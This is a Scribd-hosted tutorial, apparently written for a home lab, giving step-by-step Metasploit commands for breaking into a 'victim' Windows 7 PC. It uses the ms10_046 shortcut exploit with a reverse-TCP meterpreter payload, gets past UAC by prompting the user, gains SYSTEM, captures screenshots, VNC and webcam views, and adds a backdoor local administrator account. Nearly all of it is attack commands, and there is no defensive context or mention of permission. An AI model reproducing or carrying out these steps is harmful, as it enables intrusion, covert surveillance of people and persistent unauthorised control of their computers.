Scribd
Upload
579 views3 pages

Hack Windows with Metasploit Guide

The document provides instructions for hacking a Windows 7 machine using Metasploit framework. It describes how to start Metasploit, use the ms10_046 exploit to get reverse TCP meterpreter session on the target, and escalate privileges by getting system access and adding a new local administrator user. Screenshots, VNC, and webcam access of the target are also demonstrated.

Uploaded by

karan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
579 views3 pages

Hack Windows with Metasploit Guide

The document provides instructions for hacking a Windows 7 machine using Metasploit framework. It describes how to start Metasploit, use the ms10_046 exploit to get reverse TCP meterpreter session on the target, and escalate privileges by getting system access and adding a new local administrator user. Screenshots, VNC, and webcam access of the target are also demonstrated.

Uploaded by

karan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

HACK WINDOWS USING METASPLOIT FRAMEWORK

Start metasploit first.

# service postgresql start

# msfconsole (to start Metasploit framework)

#msf > use  exploit/windows/browser/ms10_046_shortcut_icon_dllloader

(exploit means exploting something ddl means dynamic link library it runs a code in
background we get a session of windows 7 known as meter preter session)

#msf > set payload windows/meterpreter/reverse_tcp

(kali injects a payload hence we get a tcp connection through kali and victim
machine)

#msf > set SRVHOST  192.168.81.133  (kali machine ip)

#msf > set LHOST 192.168.81.133 (kali machine ip)

#msf > set LPORT 444

#msf > exploit

Screen will give you URL that must be open on victim (win7) machine copy partial
URL 192.168.81.133\KJqldvPuyU on any Client machine.

http:// 192.168.81.133 /yUqFTYBXVO

CLICK ON ALLOW

a separate window will open , open link file.

Now go to kali machine


Press enter and type

msf > sessions -i 1

meterpreter > getsystem (to get admin system privilege)

(USE TO GETT FULL CONTROL)

(you will get error here as UAC(user account control) is not bypassed)

riv_elevate_getsystem: Operation failed: The environment is incorrect

You must see that meterpreter session has been started.you have to take
administrator privilege on victim pc ,for this you must enumerate as
administrator by following commands

meterpreter> background (run current session 1 in background)

meterpreter> use windows/local/ask

(WE ARE OPENING A DIALOG BOX IN WINDOWS IF IT ALLOW YES


WE GET FULL CONTROL)

msf exploit(windows/local/ask) > set session 1

msf exploit(windows/local/ask) > exploit

Now user on win7 is prompted for UAC , Click OK in victim win 7 pc. After
that on kali another

Meterpreter session 2 is started with administrator credential.

meterpreter> getsystem
now it should succeed.

First see users in victim pc.

meterpreter > screenshot (take victim pc desktop screenshot )

meterpreter > run vnc (to see victim remote desktop live with
view only permission)

meterpreter > run webcam (only if victim pc has webcam and driver
is installed)

Add user to to remote pc and make it member of Local Administratos


group

Method 1

Apart from these default commands, meterpreter can be further strengthen


by using some extensions. For this extension, type “use “ followed by the
name of that extension.

meterpreter > use incognito

(this command enables add_user and like more command modules)

meterpreter > add_user mark 123

meterpreter > add_localgroup_user administrators mark

If you want to go back to meterpreter type exit

C:\Windows\system32> exit

You might also like